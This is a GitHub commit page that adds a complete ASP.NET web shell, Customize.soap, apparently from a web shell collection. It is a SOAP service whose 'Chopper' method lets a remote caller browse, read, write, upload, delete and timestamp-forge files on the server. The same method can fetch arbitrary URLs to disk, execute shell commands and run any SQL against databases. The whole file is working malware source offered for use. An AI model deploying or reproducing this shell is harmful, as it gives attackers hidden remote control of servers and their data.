Skip to content

Commit 559c462

Browse files
xl7devxl7dev
committed
soap
1 parent a4af8d9 commit 559c462

File tree

1 file changed

+316
-0
lines changed

1 file changed

+316
-0
lines changed

Soap/Customize.soap

+316
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,316 @@
1+
<%@ WebService Language="C#" Class="Control" %>
2+
using System;
3+
using System.Web;
4+
using System.IO;
5+
using System.Net;
6+
using System.Text;
7+
using System.Data;
8+
using System.Data.SqlClient;
9+
using System.Collections.Generic;
10+
using System.Diagnostics;
11+
using System.Web.SessionState;
12+
using System.Web.Services;
13+
using System.Xml;
14+
using System.Web.Services.Protocols;
15+
16+
[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")]
17+
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
18+
19+
[Serializable]
20+
public class Control : MarshalByRefObject
21+
{
22+
public Control()
23+
{
24+
25+
}
26+
[WebMethod(Description="Customize Script")]
27+
public string Chopper(String z, String z1, String z2, String z3) {
28+
String Z = z;
29+
String result = "";
30+
if (Z != "")
31+
{
32+
String Z1 = z1;
33+
String Z2 = z2;
34+
String Z3 = z3;
35+
String R = "";
36+
try
37+
{
38+
switch (Z)
39+
{
40+
case "A":
41+
{
42+
String[] c = Directory.GetLogicalDrives();
43+
R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/"));
44+
for (int i = 0; i < c.Length; i++)
45+
R += c[i][0] + ":";
46+
break;
47+
}
48+
case "B":
49+
{
50+
DirectoryInfo m = new DirectoryInfo(Z1);
51+
foreach (DirectoryInfo D in m.GetDirectories())
52+
{
53+
R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
54+
}
55+
foreach (FileInfo D in m.GetFiles())
56+
{
57+
R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
58+
}
59+
break;
60+
}
61+
case "C":
62+
{
63+
StreamReader m = new StreamReader(Z1, Encoding.Default);
64+
R = m.ReadToEnd();
65+
m.Close();
66+
break;
67+
}
68+
case "D":
69+
{
70+
StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
71+
m.Write(Z2);
72+
R = "1";
73+
m.Close();
74+
break;
75+
}
76+
case "E":
77+
{
78+
if (Directory.Exists(Z1))
79+
{
80+
Directory.Delete(Z1, true);
81+
}
82+
else
83+
{
84+
File.Delete(Z1);
85+
}
86+
R = "1";
87+
break;
88+
}
89+
case "F":
90+
{
91+
result += "\x2D\x3E\x7C";
92+
HttpContext.Current.Response.WriteFile(Z1);
93+
result += "\x7C\x3C\x2D";
94+
return result;
95+
}
96+
case "G":
97+
{
98+
byte[] B=new byte[Z2.Length/2];
99+
for (int i=0;i<Z2.Length;i+=2)
100+
{
101+
B[i/2]=(byte)Convert.ToInt32(Z2.Substring(i,2),16);
102+
}
103+
if (Z3=="0" || Z3==null)
104+
{
105+
FileStream fs=new FileStream(Z1,FileMode.Create);
106+
fs.Write(B,0,B.Length);
107+
fs.Close();
108+
}
109+
else
110+
{
111+
FileStream fs=new FileStream(Z1,FileMode.Append);
112+
fs.Write(B,0,B.Length);
113+
fs.Close();
114+
}
115+
R="1";
116+
break;
117+
}
118+
case "H":
119+
{
120+
CP(Z1, Z2);
121+
R = "1";
122+
break;
123+
}
124+
case "I":
125+
{
126+
if (Directory.Exists(Z1))
127+
{
128+
Directory.Move(Z1, Z2);
129+
}
130+
else
131+
{
132+
File.Move(Z1, Z2);
133+
}
134+
break;
135+
}
136+
case "J":
137+
{
138+
Directory.CreateDirectory(Z1);
139+
R = "1";
140+
break;
141+
}
142+
case "K":
143+
{
144+
DateTime TM = Convert.ToDateTime(Z2);
145+
if (Directory.Exists(Z1))
146+
{
147+
Directory.SetCreationTime(Z1, TM);
148+
Directory.SetLastWriteTime(Z1, TM);
149+
Directory.SetLastAccessTime(Z1, TM);
150+
}
151+
else
152+
{
153+
File.SetCreationTime(Z1, TM);
154+
File.SetLastWriteTime(Z1, TM);
155+
File.SetLastAccessTime(Z1, TM);
156+
}
157+
R = "1";
158+
break;
159+
}
160+
case "L":
161+
{
162+
HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));
163+
RQ.Method = "GET";
164+
RQ.ContentType = "application/x-www-form-urlencoded";
165+
HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();
166+
Stream WF = WB.GetResponseStream();
167+
FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);
168+
int i;
169+
byte[] buffer = new byte[1024];
170+
while (true)
171+
{
172+
i = WF.Read(buffer, 0, buffer.Length);
173+
if (i < 1)
174+
{
175+
break;
176+
}
177+
FS.Write(buffer, 0, i);
178+
}
179+
WF.Close();
180+
WB.Close();
181+
FS.Close();
182+
R = "1";
183+
break;
184+
}
185+
case "M":
186+
{
187+
ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2));
188+
Process e = new Process();
189+
StreamReader OT, ER;
190+
c.UseShellExecute = false;
191+
c.RedirectStandardOutput = true;
192+
c.RedirectStandardError = true;
193+
e.StartInfo = c;
194+
c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);
195+
e.Start();
196+
OT = e.StandardOutput;
197+
ER = e.StandardError;
198+
e.Close();
199+
R = OT.ReadToEnd() + ER.ReadToEnd();
200+
break;
201+
}
202+
case "N":
203+
{
204+
String strDat = Z1.ToUpper();
205+
SqlConnection Conn = new SqlConnection(Z1);
206+
Conn.Open();
207+
R = Conn.Database + "\t";
208+
Conn.Close();
209+
break;
210+
}
211+
case "O":
212+
{
213+
String[] x = Z1.Replace("\r", "").Split('\n');
214+
String strConn = x[0], strDb = x[1];
215+
SqlConnection Conn = new SqlConnection(strConn);
216+
Conn.Open();
217+
DataTable dt = Conn.GetSchema("Columns");
218+
Conn.Close();
219+
for (int i = 0; i < dt.Rows.Count; i++)
220+
{
221+
R += String.Format("{0}\t", dt.Rows[i][2].ToString());
222+
}
223+
break;
224+
}
225+
case "P":
226+
{
227+
String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
228+
String strConn = x[0], strDb = x[1], strTable = x[2];
229+
p[0] = strDb;
230+
p[2] = strTable;
231+
SqlConnection Conn = new SqlConnection(strConn);
232+
Conn.Open();
233+
DataTable dt = Conn.GetSchema("Columns", p);
234+
Conn.Close();
235+
for (int i = 0; i < dt.Rows.Count; i++)
236+
{
237+
R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
238+
}
239+
break;
240+
}
241+
case "Q":
242+
{
243+
String[] x = Z1.Replace("\r", "").Split('\n');
244+
String strDat, strConn = x[0], strDb = x[1];
245+
int i, c;
246+
strDat = Z2.ToUpper();
247+
SqlConnection Conn = new SqlConnection(strConn);
248+
Conn.Open();
249+
if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
250+
{
251+
SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);
252+
DataSet ds = new DataSet();
253+
OD.Fill(ds);
254+
if (ds.Tables.Count > 0)
255+
{
256+
DataRowCollection rows = ds.Tables[0].Rows;
257+
for (c = 0; c < ds.Tables[0].Columns.Count; c++)
258+
{
259+
R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
260+
}
261+
R += "\r\n";
262+
for (i = 0; i < rows.Count; i++)
263+
{
264+
for (c = 0; c < ds.Tables[0].Columns.Count; c++)
265+
{
266+
R += String.Format("{0}\t|\t", rows[i][c].ToString());
267+
}
268+
R += "\r\n";
269+
}
270+
}
271+
ds.Clear();
272+
ds.Dispose();
273+
}
274+
else
275+
{
276+
SqlCommand cm = Conn.CreateCommand();
277+
cm.CommandText = Z2;
278+
cm.ExecuteNonQuery();
279+
R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
280+
}
281+
Conn.Close();
282+
break;
283+
}
284+
default: goto End;
285+
}
286+
}
287+
catch (Exception E)
288+
{
289+
R = "ERROR:// " + E.Message;
290+
}
291+
result += "\x2D\x3E\x7C" + R + "\x7C\x3C\x2D";
292+
End: ;
293+
}
294+
return result;
295+
}
296+
public void CP(String S, String D)
297+
{
298+
if (Directory.Exists(S))
299+
{
300+
DirectoryInfo m = new DirectoryInfo(S);
301+
Directory.CreateDirectory(D);
302+
foreach (FileInfo F in m.GetFiles())
303+
{
304+
File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
305+
}
306+
foreach (DirectoryInfo F in m.GetDirectories())
307+
{
308+
CP(S + "\\" + F.Name, D + "\\" + F.Name);
309+
}
310+
}
311+
else
312+
{
313+
File.Copy(S, D);
314+
}
315+
}
316+
}

0 commit comments

Comments
 (0)